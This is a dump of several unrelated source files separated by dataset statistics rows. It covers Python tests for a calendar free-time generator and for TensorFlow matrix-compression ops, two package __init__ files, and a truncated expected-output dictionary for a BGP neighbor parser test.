startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T18:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase7():
# test case to check two-event system where two events have the same start and end
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T14:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase8():
# test case to check two-event system where the first event start is before the second end start and both events have the same end
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T12:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T14:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase9():
# cluster f*ck test # 1: creates cluster f*ck within single day
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T12:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T11:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry3 = {'start':arrow.get('2015-12-10T09:00:00-08:00'), 'end':arrow.get('2015-12-10T11:00:00-08:00')}
entry4 = {'start':arrow.get('2015-12-10T15:00:00-08:00'), 'end':arrow.get('2015-12-10T16:00:00-08:00')}
entry5 = {'start':arrow.get('2015-12-10T14:00:00-08:00'), 'end':arrow.get('2015-12-10T18:00:00-08:00')}
entryList = [entry1,entry2,entry3,entry4,entry5]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T09:00:00-08:00]>], ",
"[<Arrow [2015-12-10T18:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase10():
# cluster f*ck test # 1: creates cluster f*ck over several days
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T12:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T11:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry3 = {'start':arrow.get('2015-12-11T09:00:00-08:00'), 'end':arrow.get('2015-12-11T11:00:00-08:00')}
entry4 = {'start':arrow.get('2015-12-11T15:00:00-08:00'), 'end':arrow.get('2015-12-11T16:00:00-08:00')}
entry5 = {'start':arrow.get('2015-12-13T14:00:00-08:00'), 'end':arrow.get('2015-12-13T18:00:00-08:00')}
entry6 = {'start':arrow.get('2015-12-13T09:00:00-08:00'), 'end':arrow.get('2015-12-13T12:00:00-08:00')}
# entryList = [entry1,entry2,entry3,entry4,entry5]
entryList = [entry1,entry2,entry3,entry4,entry5]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-13T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T14:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>], ",
"[<Arrow [2015-12-11T07:00:00-08:00]>, <Arrow [2015-12-11T09:00:00-08:00]>], ",
"[<Arrow [2015-12-11T11:00:00-08:00]>, <Arrow [2015-12-11T15:00:00-08:00]>], ",
"[<Arrow [2015-12-11T16:00:00-08:00]>, <Arrow [2015-12-11T21:00:00-08:00]>], ",
"[<Arrow [2015-12-12T07:00:00-08:00]>, <Arrow [2015-12-12T21:00:00-08:00]>], ",
"[<Arrow [2015-12-13T07:00:00-08:00]>, <Arrow [2015-12-13T14:00:00-08:00]>], ",
"[<Arrow [2015-12-13T18:00:00-08:00]>, <Arrow [2015-12-13T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
| 47.832558 | 131 | 0.659374 | 1,633 | 10,284 | 4.15248 | 0.074709 | 0.111488 | 0.111488 | 0.148651 | 0.905914 | 0.90031 | 0.90031 | 0.856363 | 0.846335 | 0.806813 | 0 | 0.25974 | 0.123979 | 10,284 | 214 | 132 | 48.056075 | 0.492951 | 0.105018 | 0 | 0.72028 | 0 | 0.188811 | 0.450256 | 0.369729 | 0 | 0 | 0 | 0 | 0.06993 | 1 | 0.06993 | false | 0 | 0.027972 | 0 | 0.097902 | 0.111888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fca08b2994b172ed6223a62746289e773e1e3c77 | 11,680 | py | Python | graph_compression/compression_lib/dl_compression_op_test.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 7 | 2021-06-15T05:54:29.000Z | 2022-02-21T06:57:06.000Z | graph_compression/compression_lib/dl_compression_op_test.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 12 | 2021-08-25T16:15:31.000Z | 2022-02-10T05:10:37.000Z | graph_compression/compression_lib/dl_compression_op_test.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 5 | 2021-11-25T07:40:17.000Z | 2022-03-22T11:13:39.000Z | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for dl_compression_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf
from graph_compression.compression_lib import compression_op
from graph_compression.compression_lib import dl_compression_op
class DlCompressionOpTest(tf.test.TestCase):
def test_DLDecompMatrixCompressor_interface(self):
compressor = dl_compression_op.DLMatrixCompressor(
spec=compression_op.LowRankDecompMatrixCompressor.get_default_hparams())
B = np.random.normal(0, 1, [20, 10]) # pylint: disable = invalid-name
sub_thresh_indices = (B <= 0.5)
B[sub_thresh_indices] = 0
B[:, 0] = np.ones(shape=B[:, 0].shape)
C = np.random.normal(0, 1, [10, 5]) # pylint: disable = invalid-name
A = np.matmul(B, C) # pylint: disable = invalid-name
[B_out, C_out] = compressor.static_matrix_compressor(A, n_iterations=32) # pylint: disable = invalid-name
A_recovered = np.matmul(B_out, C_out) # pylint: disable = invalid-name
print("np.linalg.norm(A-A_recovered) / np.linalg.norm(A): ",
np.linalg.norm(A - A_recovered) / np.linalg.norm(A))
print("A: ", A)
print("A_recovered: ", A_recovered)
print("fraction error np.linalg.norm(A-A_recovered): ",
np.linalg.norm(A - A_recovered) / np.linalg.norm(A))
self.assertLessEqual(
np.linalg.norm(A - A_recovered) / np.linalg.norm(A), 0.1)
def test_dl_compression_op_interface(self):
with self.cached_session() as session:
self.check_dl_compression_op_interface(session)
def test_dl_compression_op_interface_supervisor(self):
with tf.Session() as session:
session.graph._unsafe_unfinalize()
self.check_dl_compression_op_interface_sparse(session, use_dl_op=True)
def check_dl_compression_op_interface(self, session, use_dl_op=False):
compression_hparams = ("name=cifar10_compression," +
"begin_compression_step=1000," +
"end_compression_step=120000," +
"compression_frequency=100," +
"compression_option=3," + "rank=200," +
"update_option=1")
update_style = 1
global_step = tf.get_variable("global_step", initializer=30)
compression_op_spec = compression_op.CompressionOp.get_default_hparams(
).parse(compression_hparams)
compression_op_spec.set_hparam("use_tpu", False)
if use_dl_op:
CompOp = dl_compression_op.DLCompressionOp # pylint: disable = invalid-name
else:
CompOp = compression_op.CompressionOp # pylint: disable = invalid-name
c = CompOp(spec=compression_op_spec, global_step=global_step)
# Need to add initial value for A so that we would know what to expect back.
code = np.random.normal(0, 1, [20, 10])
dictionary = np.random.normal(0, 1, [10, 5])
A_init = np.matmul(code, dictionary) # pylint: disable = invalid-name
A = tf.get_variable( # pylint: disable = invalid-name
"A",
initializer=A_init.astype(np.float32),
dtype=tf.float32)
MC = dl_compression_op.DLMatrixCompressor( # pylint: disable = invalid-name
spec=compression_op.LowRankDecompMatrixCompressor.get_default_hparams()
.parse("num_rows=3,num_cols=3,rank=200,is_b_matrix_trainable=False"))
[_, A_update_op] = c.get_apply_compression_op( # pylint: disable = invalid-name
A, MC, scope="my_scope")
tf.global_variables_initializer().run()
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
np.linalg.norm(c.b_matrix_tfvar.eval()),
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.a_matrix_tfvar.eval())) < 0.00001),
False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001), True)
tf.assign(global_step, 1001).eval()
print("global_step.eval is ", global_step.eval())
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
np.linalg.norm(c.b_matrix_tfvar.eval()),
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.b_matrix_tfvar.eval())) < 0.00001),
False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001),
False)
[B, C] = MC.static_matrix_compressor( # pylint: disable = invalid-name
c.a_matrix_tfvar.eval())
print("norm of error is ", np.linalg.norm(B - c.b_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(np.abs(B - c.b_matrix_tfvar.eval()) < 0.00001), True)
self.assertAllEqual(
np.all(np.abs(C - c.c_matrix_tfvar.eval()) < 0.00001), True)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.b_matrix_tfvar.eval())) < 0.00001),
False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001),
False)
tf.assign(global_step, 1001).eval()
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
np.linalg.norm(c.b_matrix_tfvar.eval()),
np.linalg.norm(c.c_matrix_tfvar.eval()))
tf.assign(global_step, 2000).eval()
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
self.assertAlmostEqual(c.alpha.eval(), 0.97)
self.assertEqual(c._last_alpha_update_step.eval(), 2000)
def check_dl_compression_op_interface_sparse(self, session, use_dl_op=False):
compression_hparams = ("name=cifar10_compression," +
"begin_compression_step=1000," +
"end_compression_step=120000," +
"compression_frequency=100," +
"compression_option=3," + "rank=200," +
"update_option=1")
update_style = 1
global_step = tf.get_variable("global_step", initializer=30)
compression_op_spec = compression_op.CompressionOp.get_default_hparams(
).parse(compression_hparams)
compression_op_spec.set_hparam("use_tpu", False)
if use_dl_op:
CompOp = dl_compression_op.DLCompressionOp # pylint: disable = invalid-name
else:
CompOp = compression_op.CompressionOp # pylint: disable = invalid-name
c = CompOp(spec=compression_op_spec, global_step=global_step)
code = np.random.normal(0, 1, [20, 10])
dictionary = np.random.normal(0, 1, [10, 5])
A_init = np.matmul(code, dictionary) # pylint: disable = invalid-name
A = tf.get_variable( # pylint: disable = invalid-name
"A", initializer=A_init.astype(np.float32), dtype=tf.float32)
MC = dl_compression_op.DLMatrixCompressor( # pylint: disable = invalid-name
spec=compression_op.LowRankDecompMatrixCompressor.get_default_hparams(
).parse("num_rows=3,num_cols=3,rank=200,is_b_matrix_trainable=False"))
[_, A_update_op] = c.get_apply_compression_op( # pylint: disable = invalid-name
A, MC, scope="my_scope")
tf.global_variables_initializer().run()
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
c.b_matrix_indices_tfvar.eval().size,
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.a_matrix_tfvar.eval())) < 0.00001),
False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001), True)
tf.assign(global_step, 1001).eval()
print("global_step.eval is ", global_step.eval())
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
c.b_matrix_indices_tfvar.eval().size,
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(c.b_matrix_indices_tfvar.eval().size < 0.00001), False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001),
False)
[B, C] = MC.static_matrix_compressor(c.a_matrix_tfvar.eval()) # pylint: disable = invalid-name
print("B, B_tfvar :", B, c.b_matrix_tfvar.eval())
print("norm of error is ",
np.linalg.norm(B - tf.sparse.to_dense(c.b_matrix_tfvar).eval()))
self.assertAllEqual(
np.all(
np.abs(B - tf.sparse.to_dense(c.b_matrix_tfvar).eval()) < 0.00001),
True)
self.assertAllEqual(
np.all(np.abs(C - c.c_matrix_tfvar.eval()) < 0.00001), True)
self.assertAllEqual(
np.all(c.b_matrix_indices_tfvar.eval().size < 0.00001), False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001),
False)
tf.assign(global_step, 1001).eval()
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
c.b_matrix_indices_tfvar.eval().size,
np.linalg.norm(c.c_matrix_tfvar.eval()))
tf.assign(global_step, 2000).eval()
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
c.b_matrix_indices_tfvar.eval().size,
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAlmostEqual(c.alpha.eval(), 0.97)
self.assertEqual(c._last_alpha_update_step.eval(), 2000)
if __name__ == "__main__":
tf.test.main()
| 40.696864 | 110 | 0.667038 | 1,664 | 11,680 | 4.426082 | 0.129808 | 0.051324 | 0.061914 | 0.047658 | 0.830414 | 0.809369 | 0.770401 | 0.756551 | 0.756551 | 0.756551 | 0 | 0.027314 | 0.194435 | 11,680 | 286 | 111 | 40.839161 | 0.755447 | 0.11036 | 0 | 0.754464 | 0 | 0 | 0.11197 | 0.059415 | 0 | 0 | 0 | 0 | 0.09375 | 1 | 0.022321 | false | 0 | 0.03125 | 0 | 0.058036 | 0.183036 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5d76dff458fcee8d391a62b343b113ba43a82f0a | 358 | py | Python | lstchain/irf/__init__.py | mdebony/cta-lstchain | 9030a53478459aeaa601367653be1d8854eee807 | [
"BSD-3-Clause"
] | null | null | null | lstchain/irf/__init__.py | mdebony/cta-lstchain | 9030a53478459aeaa601367653be1d8854eee807 | [
"BSD-3-Clause"
] | null | null | null | lstchain/irf/__init__.py | mdebony/cta-lstchain | 9030a53478459aeaa601367653be1d8854eee807 | [
"BSD-3-Clause"
] | null | null | null | from .hdu_table import (
create_hdu_index_hdu,
create_obs_index_hdu,
create_event_list,
get_timing_params,
get_pointing_params,
add_icrs_position_params
)
__all__ = [
"create_hdu_index_hdu",
"create_obs_index_hdu",
"create_event_list",
"get_timing_params",
"get_pointing_params",
"add_icrs_position_params"
]
| 19.888889 | 30 | 0.726257 | 47 | 358 | 4.787234 | 0.361702 | 0.142222 | 0.248889 | 0.151111 | 0.906667 | 0.906667 | 0.906667 | 0.906667 | 0.906667 | 0.906667 | 0 | 0 | 0.195531 | 358 | 17 | 31 | 21.058824 | 0.78125 | 0 | 0 | 0 | 0 | 0 | 0.326816 | 0.067039 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5d82dcc252301e2e39cd147d97070960425a5538 | 156 | py | Python | csbdeep/utils/__init__.py | Takuya1031/CSBDeep | 75877938b329173fb33cc19b2d96a773ed000b62 | [
"BSD-3-Clause"
] | 205 | 2018-02-27T09:54:56.000Z | 2022-03-24T02:20:02.000Z | csbdeep/utils/__init__.py | Takuya1031/CSBDeep | 75877938b329173fb33cc19b2d96a773ed000b62 | [
"BSD-3-Clause"
] | 59 | 2018-02-07T07:56:59.000Z | 2022-02-03T14:05:23.000Z | csbdeep/utils/__init__.py | Takuya1031/CSBDeep | 75877938b329173fb33cc19b2d96a773ed000b62 | [
"BSD-3-Clause"
] | 81 | 2018-06-02T15:03:19.000Z | 2022-03-12T08:43:17.000Z | from __future__ import print_function, unicode_literals, absolute_import, division
from .plot_utils import *
from .utils import *
from .utils import _raise | 31.2 | 82 | 0.826923 | 21 | 156 | 5.714286 | 0.571429 | 0.275 | 0.25 | 0.333333 | 0.341667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121795 | 156 | 5 | 83 | 31.2 | 0.875912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
5d83e08f64768c2d4a4a79cad961f770ae492d0d | 27,991 | py | Python | src/genie/libs/parser/iosxe/tests/ShowBgpNeighbors/cli/equal/golden_output1_expected.py | jmedina0911/genieparser | 2fcd6d3e44891551af4b9d05e2c053218ee25c32 | [
"Apache-2.0"
] | 4 | 2020-08-20T12:23:12.000Z | 2021-06-15T14:10:02.000Z | src/genie/libs/parser/iosxe/tests/ShowBgpNeighbors/cli/equal/golden_output1_expected.py | jmedina0911/genieparser | 2fcd6d3e44891551af4b9d05e2c053218ee25c32 | [
"Apache-2.0"
] | 119 | 2020-07-10T22:37:51.000Z | 2021-03-18T02:40:05.000Z | src/genie/libs/parser/iosxe/tests/ShowBgpNeighbors/cli/equal/golden_output1_expected.py | jmedina0911/genieparser | 2fcd6d3e44891551af4b9d05e2c053218ee25c32 | [
"Apache-2.0"
] | 2 | 2020-07-10T15:33:42.000Z | 2021-04-05T09:48:56.000Z | expected_output = {
"list_of_neighbors": ["10.1.1.1", "10.2.2.2"],
"vrf": {
"default": {
"neighbor": {
"10.1.1.1": {
"address_family": {
"ipv4 unicast": {
"advertise_bit": 0,
"bgp_table_version": 1,
"dynamic_slow_peer_recovered": "never",
"index": 1,
"last_detected_dynamic_slow_peer": "never",
"last_received_refresh_end_of_rib": "never",
"last_received_refresh_start_of_rib": "never",
"last_sent_refresh_end_of_rib": "never",
"last_sent_refresh_start_of_rib": "never",
"local_policy_denied_prefixes_counters": {
"inbound": {"total": 0},
"outbound": {"total": 0},
},
"max_nlri": 0,
"min_nlri": 0,
"neighbor_version": "1/0",
"output_queue_size": 0,
"prefix_activity_counters": {
"received": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_current": 0,
"prefixes_total": 0,
"used_as_bestpath": 0,
"used_as_multipath": 0,
"used_as_secondary": 0,
},
"sent": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_current": 0,
"prefixes_total": 0,
"used_as_bestpath": "n/a",
"used_as_multipath": "n/a",
"used_as_secondary": "n/a",
},
},
"refresh_activity_counters": {
"received": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
"sent": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
},
"refresh_epoch": 1,
"slow_peer_detection": False,
"slow_peer_split_update_group_dynamic": False,
"update_group_member": 1,
},
"vpnv4 unicast": {
"advertise_bit": 1,
"bgp_table_version": 21,
"current_time": "0x13F885E6",
"dynamic_slow_peer_recovered": "never",
"extended_community_attribute_sent": True,
"index": 3,
"last_detected_dynamic_slow_peer": "never",
"last_received_refresh_end_of_rib": "never",
"last_received_refresh_start_of_rib": "never",
"last_sent_refresh_end_of_rib": "never",
"last_sent_refresh_start_of_rib": "never",
"local_policy_denied_prefixes_counters": {
"inbound": {
"af_permit_check": "n/a",
"bestpath_from_ibgp_peer": "n/a",
"bestpath_from_this_peer": "n/a",
"originator_loop": 8,
"total": 8,
},
"outbound": {
"af_permit_check": 4,
"bestpath_from_ibgp_peer": 4,
"bestpath_from_this_peer": 4,
"originator_loop": "n/a",
"total": 12,
},
},
"max_nlri": 1,
"min_nlri": 0,
"neighbor_version": "21/0",
"output_queue_size": 0,
"prefix_activity_counters": {
"received": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_total": 4,
"used_as_bestpath": 4,
"used_as_multipath": 0,
"used_as_secondary": 0,
},
"sent": {
"explicit_withdraw": 0,
"implicit_withdraw": 4,
"prefixes_total": 8,
"used_as_bestpath": "n/a",
"used_as_multipath": "n/a",
"used_as_secondary": "n/a",
},
},
"refresh_activity_counters": {
"received": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
"sent": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
},
"refresh_epoch": 1,
"slow_peer_detection": False,
"slow_peer_split_update_group_dynamic": False,
"update_group_member": 3,
},
},
"bgp_event_timer": {
"next": {
"ackhold": "0x0",
"deadwait": "0x0",
"giveup": "0x0",
"keepalive": "0x0",
"linger": "0x0",
"pmtuager": "0x0",
"processq": "0x0",
"retrans": "0x0",
"sendwnd": "0x0",
"timewait": "0x0",
},
"starts": {
"ackhold": 6150,
"deadwait": 0,
"giveup": 0,
"keepalive": 0,
"linger": 0,
"pmtuager": 0,
"processq": 0,
"retrans": 6150,
"sendwnd": 0,
"timewait": 0,
},
"wakeups": {
"ackhold": 6008,
"deadwait": 0,
"giveup": 0,
"keepalive": 0,
"linger": 0,
"pmtuager": 0,
"processq": 0,
"retrans": 0,
"sendwnd": 0,
"timewait": 0,
},
},
"bgp_neighbor_session": {"sessions": 1},
"bgp_negotiated_capabilities": {
"enhanced_refresh": "advertised and received",
"four_octets_asn": "advertised and received",
"ipv4_unicast": "advertised and received",
"route_refresh": "advertised and received(new)",
"stateful_switchover": "NO for session 1",
"vpnv4_unicast": "advertised and received",
},
"bgp_negotiated_keepalive_timers": {
"hold_time": 180,
"keepalive_interval": 60,
},
"bgp_neighbor_counters": {
"messages": {
"in_queue_depth": 0,
"out_queue_depth": 0,
"received": {
"keepalives": 6147,
"notifications": 0,
"opens": 1,
"route_refresh": 0,
"total": 6162,
"updates": 14,
},
"sent": {
"keepalives": 6146,
"notifications": 0,
"opens": 1,
"route_refresh": 0,
"total": 6157,
"updates": 10,
},
}
},
"bgp_session_transport": {
"ack_hold": 200,
"address_tracking_status": "enabled",
"connection": {
"dropped": 0,
"established": 1,
"last_reset": "never",
},
"connection_state": "estab",
"connection_tableid": 0,
"datagram": {
"datagram_received": {
"out_of_order": 0,
"total_data": 118194,
"value": 12281,
"with_data": 6151,
},
"datagram_sent": {
"fastretransmit": 0,
"partialack": 0,
"retransmit": 0,
"second_congestion": 0,
"total_data": 117635,
"value": 12246,
"with_data": 6151,
},
},
"delrcvwnd": 19,
"ecn_connection": "disabled",
"enqueued_packets": {
"input_packet": 0,
"mis_ordered_packet": 0,
"retransmit_packet": 0,
},
"fast_lock_acquisition_failures": 0,
"graceful_restart": "disabled",
"io_status": 1,
"ip_precedence_value": 6,
"irs": 547332975,
"iss": 3484933877,
"krtt": 0,
"lock_slow_path": 0,
"max_rtt": 1000,
"maximum_output_segment_queue_size": 50,
"maxrcvwnd": 16384,
"min_rtt": 1,
"min_time_between_advertisement_runs": 0,
"minimum_incoming_ttl": 0,
"option_flags": "nagle, path mtu capable",
"outgoing_ttl": 255,
"packet_fast_path": 0,
"packet_fast_processed": 0,
"packet_slow_path": 0,
"rcv_scale": 0,
"rcvnxt": 547451170,
"rcvwnd": 16365,
"receive_idletime": 33158,
"rib_route_ip": "10.1.1.1",
"rtto": 1003,
"rtv": 3,
"sent_idletime": 33361,
"snd_scale": 0,
"sndnxt": 3485051513,
"snduna": 3485051513,
"sndwnd": 15453,
"srtt": 1000,
"sso": False,
"status_flags": "passive open, gen tcbs",
"tcp_path_mtu_discovery": "enabled",
"tcp_semaphore": "0x7F59978AAB40",
"tcp_semaphore_status": "FREE",
"transport": {
"foreign_host": "10.1.1.1",
"foreign_port": "44730",
"local_host": "10.5.5.5",
"local_port": "179",
"mss": 1396,
},
"unread_input_bytes": 0,
"uptime": 334841877,
},
"bgp_version": 4,
"link": "internal",
"remote_as": 65000,
"router_id": "10.1.1.1",
"session_state": "Established",
"shutdown": False,
},
"10.2.2.2": {
"address_family": {
"ipv4 unicast": {
"advertise_bit": 0,
"bgp_table_version": 1,
"dynamic_slow_peer_recovered": "never",
"index": 1,
"last_detected_dynamic_slow_peer": "never",
"last_received_refresh_end_of_rib": "never",
"last_received_refresh_start_of_rib": "never",
"last_sent_refresh_end_of_rib": "never",
"last_sent_refresh_start_of_rib": "never",
"local_policy_denied_prefixes_counters": {
"inbound": {"total": 0},
"outbound": {"total": 0},
},
"max_nlri": 0,
"min_nlri": 0,
"neighbor_version": "1/0",
"output_queue_size": 0,
"prefix_activity_counters": {
"received": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_current": 0,
"prefixes_total": 0,
"used_as_bestpath": 0,
"used_as_multipath": 0,
"used_as_secondary": 0,
},
"sent": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_current": 0,
"prefixes_total": 0,
"used_as_bestpath": "n/a",
"used_as_multipath": "n/a",
"used_as_secondary": "n/a",
},
},
"refresh_activity_counters": {
"received": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
"sent": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
},
"refresh_epoch": 1,
"slow_peer_detection": False,
"slow_peer_split_update_group_dynamic": False,
